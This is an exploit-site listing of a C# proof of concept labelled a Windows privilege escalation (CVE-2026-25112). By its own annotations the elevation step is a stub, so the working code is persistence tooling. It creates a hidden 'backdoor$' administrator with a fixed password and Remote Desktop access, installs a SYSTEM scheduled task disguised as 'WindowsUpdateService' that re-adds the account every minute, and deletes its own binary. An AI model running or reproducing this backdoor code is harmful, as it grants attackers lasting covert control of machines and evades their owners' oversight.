## https://sploitus.com/exploit?id=PACKETSTORM:223813
==================================================================================================================================
    | # Title     : Windows Local Privilege Escalation and Persistence GenetecLPE                                                    |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : No standalone download available                                                                                 |
    ==================================================================================================================================
    
    [+] Summary    :  Describes a local privilege escalation (LPE) workflow on Windows systems (CVE-2026-25112), modelled on token impersonation attacks such as Rotten Potato–style methods. Note that in the PoC below the elevation step is a stub: ElevateToSystem() prints a message and returns true without obtaining or impersonating any token (the ImpersonateLoggedOnUser/GetCurrentThread imports are never called), so the listing demonstrates only the post-elevation steps — creating a local administrator account, registering a SYSTEM scheduled task that re-creates it every minute, and deleting its own binary — and succeeds only with rights the caller already holds.
    
    
    [+] POC        :  
    
    using System;
    using System.Diagnostics;
    using System.Runtime.InteropServices;
    using Microsoft.Win32.SafeHandles;
    using System.IO;
    
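    namespace GenetecLPE
    {
        /// <summary>
        /// Proof-of-concept listing from the advisory above. As published it performs no
        /// privilege escalation: the Win32 imports below are declared but never invoked, and
        /// the original ElevateToSystem() returned true unconditionally, so every run printed
        /// "[+] Elevated to SYSTEM." and then created the account and the scheduled task with
        /// whatever rights the caller already had. This version reports the real token state
        /// and the real child-process exit codes instead of assuming success.
        /// </summary>
        class Program
        {
            // Declared in the original but never called: no token handle is ever obtained for
            // hToken, so there is no impersonation path anywhere in this program.
            [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)]
            public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);

            [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
            public static extern IntPtr GetCurrentThread();

            /// <summary>
            /// Reports whether the current process already runs as LocalSystem. Nothing is
            /// elevated here: the listing contains no token duplication or impersonation step,
            /// so the only honest answer is the identity the process was started with.
            /// </summary>
            /// <returns>true when the current Windows identity is the SYSTEM account; otherwise false.</returns>
            static bool ElevateToSystem()
            {
                Console.WriteLine("[*] Attempting to impersonate SYSTEM token...");
                // The original returned true without doing any work, which made the
                // "Elevation failed" branch in Main unreachable and its success line a lie.
                bool isSystem = System.Security.Principal.WindowsIdentity.GetCurrent().IsSystem;
                Console.WriteLine(isSystem
                    ? "[*] Process already holds a SYSTEM token."
                    : "[-] No SYSTEM token: this listing contains no impersonation step.");
                return isSystem;
            }

            /// <summary>
            /// Runs <paramref name="fileName"/> with <paramref name="arguments"/> in a hidden
            /// window and waits for it to finish.
            /// </summary>
            /// <param name="fileName">Executable to launch (resolved via the normal search path).</param>
            /// <param name="arguments">Command line passed verbatim to the child.</param>
            /// <returns>The child's exit code, or -1 when no process was started.</returns>
            private static int RunHidden(string fileName, string arguments)
            {
                ProcessStartInfo psi = new ProcessStartInfo
                {
                    FileName = fileName,
                    Arguments = arguments,
                    WindowStyle = ProcessWindowStyle.Hidden,
                };
                // Process.Start can return null when no new process is started; the original
                // dereferenced the result unconditionally and never disposed it.
                using (Process child = Process.Start(psi))
                {
                    if (child == null)
                    {
                        return -1;
                    }
                    child.WaitForExit();
                    return child.ExitCode;
                }
            }

            /// <summary>
            /// Creates the local account <c>backdoor$</c> with the hard-coded password from the
            /// listing and adds it to Administrators and Remote Desktop Users via net.exe.
            /// The original printed its success line regardless of whether net.exe was refused;
            /// here a non-zero exit code stops the sequence and is reported.
            /// </summary>
            static void CreateHiddenAdmin()
            {
                string[] steps =
                {
                    "user backdoor$ P@ssw0rd123! /add",
                    "localgroup Administrators backdoor$ /add",
                    "localgroup \"Remote Desktop Users\" backdoor$ /add",
                };
                try
                {
                    for (int i = 0; i < steps.Length; i++)
                    {
                        int rc = RunHidden("net.exe", steps[i]);
                        if (rc != 0)
                        {
                            // Step number rather than the argument string, so the password is
                            // not echoed to the console on failure.
                            Console.WriteLine("[-] net.exe step " + (i + 1) + " of " + steps.Length + " exited with code " + rc + "; account setup incomplete.");
                            return;
                        }
                    }
                    Console.WriteLine("[+] Hidden user 'backdoor$' created and added to Administrators.");
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[-] Failed to create user: " + ex.Message);
                }
            }

            /// <summary>
            /// Registers a scheduled task named "WindowsUpdateService" that re-creates the
            /// backdoor account every minute, running as SYSTEM. The schtasks.exe exit code is
            /// checked instead of assumed; the task argument string is kept verbatim from the
            /// listing.
            /// </summary>
            static void InstallPersistence()
            {
                const string taskArguments = "/create /tn \"WindowsUpdateService\" /tr \"cmd.exe /c net user backdoor$ P@ssw0rd123! /add && net localgroup Administrators backdoor$ /add\" /sc minute /mo 1 /ru SYSTEM /f";
                try
                {
                    int rc = RunHidden("schtasks.exe", taskArguments);
                    if (rc != 0)
                    {
                        Console.WriteLine("[-] schtasks.exe exited with code " + rc + "; task not installed.");
                        return;
                    }
                    Console.WriteLine("[+] Persistence installed as 'WindowsUpdateService' scheduled task.");
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[-] Failed to install persistence: " + ex.Message);
                }
            }

            /// <summary>
            /// Best-effort removal of the running binary. Assembly.Location can be empty (for
            /// example in single-file publishes), and Windows normally refuses to delete an
            /// image that is still mapped, so failure is reported rather than silently swallowed
            /// as in the original <c>catch { }</c>.
            /// </summary>
            static void SelfDestruct()
            {
                string currentPath = System.Reflection.Assembly.GetExecutingAssembly().Location;
                if (string.IsNullOrEmpty(currentPath))
                {
                    Console.WriteLine("[-] Self-delete skipped: executing assembly has no on-disk location.");
                    return;
                }
                try
                {
                    File.Delete(currentPath);
                    Console.WriteLine("[*] Payload self-deleted.");
                }
                catch (Exception ex)
                {
                    Console.WriteLine("[-] Self-delete failed: " + ex.Message);
                }
            }

            /// <summary>
            /// Entry point: prints the caller's identity, then runs the account creation,
            /// scheduled-task installation and self-deletion only when the process actually
            /// runs as SYSTEM. The "Elevation failed" branch is now reachable.
            /// </summary>
            static void Main(string[] args)
            {
                Console.WriteLine("[*] Fake handle.exe executed as: " + System.Security.Principal.WindowsIdentity.GetCurrent().Name);
                if (!ElevateToSystem())
                {
                    Console.WriteLine("[-] Elevation failed, running with limited privileges.");
                    return;
                }
                // Wording changed from "Elevated to SYSTEM": nothing was elevated, the token was
                // already SYSTEM when the process started.
                Console.WriteLine("[+] Running as SYSTEM.");
                CreateHiddenAdmin();
                InstallPersistence();
                SelfDestruct();
            }
        }
    }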
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================